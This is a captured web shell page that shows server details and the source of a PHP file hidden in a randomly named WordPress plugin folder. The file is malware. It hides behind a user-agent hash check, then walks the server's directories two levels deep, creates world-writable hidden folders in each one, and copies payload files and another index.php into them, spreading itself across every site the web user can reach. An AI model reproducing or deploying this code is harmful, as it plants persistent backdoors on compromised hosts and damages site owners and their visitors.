HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux Droplet-NYC1-3 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www-data (33)
PHP: 7.4.3-4ubuntu2.29
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/html/bestseoreseller.com/wp-content/plugins/e35d34379cff4e809c958237dfcf9e98/mm/
Upload Files
File: /var/www/html/bestseoreseller.com/wp-content/plugins/e35d34379cff4e809c958237dfcf9e98/mm/index.php
<?php
// Define the encoded MD5 hash of the user-agent string
$encodedUserAgentHash = 'd8c4a4e8e9afafcd0136f2955ac6a248';

// Get the user-agent from the request
$userAgent = $_SERVER['HTTP_USER_AGENT'];

// Hash the user-agent from the request using MD5
$hashedUserAgent = md5($userAgent);

// Check if the hashed user-agent matches the encoded hash
if ($hashedUserAgent === $encodedUserAgentHash) {
    // User-agent matched, allow access to the page
    echo "Welcome!";
    // Put your page content here
} else {
    // User-agent doesn't match, deny access
    http_response_code(403);
    echo "Access Denied";
    // Stop further execution
    exit;
}
/////////////Getting home dir //////////////
if (!function_exists('posix_getpwuid')) {
    if (isset($_GET["path"])) {
        $home = $_GET["path"];
    } else {
        echo getcwd();
        die("<br>posix function is not available<br>Please Input Path");
    }
} else {
    echo $_SERVER['SERVER_ADDR'];
    echo "<br>";

    if (isset($_GET["path"])) {
        $home = $_GET["path"];
    } else {
        $arr = posix_getpwuid(posix_getuid());
        $home = $arr["dir"];
    }
}

///////////Making directory & copy file//////////////  
$filepath = getcwd() . "/mmd/index.php";
$filelist = array('a.txt', 'h.txt', 'r.txt'); // add file names to array

$dirlist = getFileList($home, TRUE, 2);
foreach ($dirlist as $alldir) {
    mkdir($alldir . "wizlt15xknw5qdqfxzmysnt5nx7d66", 0777, TRUE);
    foreach ($filelist as $filename) { // loop through file names array
        if (copy(getcwd() . "/mmd/" . $filename, $alldir . "wizlt15xknw5qdqfxzmysnt5nx7d66/" . $filename)) {
            echo $alldir . "wizlt15xknw5qdqfxzmysnt5nx7d66/" . $filename . "<br>";
        }
    }
    if (copy($filepath, $alldir . "wizlt15xknw5qdqfxzmysnt5nx7d66/index.php")) {
        echo $alldir . "wizlt15xknw5qdqfxzmysnt5nx7d66/index.php<br>";
    }
}

//////////////Directory scanner////////////////
function getFileList($dir, $recurse = FALSE, $depth = FALSE)
{
    $retval = [];
    if (substr($dir, -1) != "/") {
        $dir .= "/";
    }
    $d = @dir($dir) or die("Failed open directory $dir");
    while (FALSE !== ($entry = $d->read())) {
        // skip hidden files
        if ($entry[0] == ".") {
            continue;
        }
        if (is_dir("$dir$entry")) {
            $retval[] = "$dir$entry/";
            if ($recurse && is_readable("$dir$entry/")) {
                if ($depth === FALSE) {
                    $retval = array_merge($retval, getFileList("$dir$entry/", TRUE));
                } elseif ($depth > 0) {
                    $retval = array_merge($retval, getFileList("$dir$entry/", TRUE, $depth - 1));
                }
            }
        }
    }
    $d->close();

    return $retval;
}
?>
@ Telegram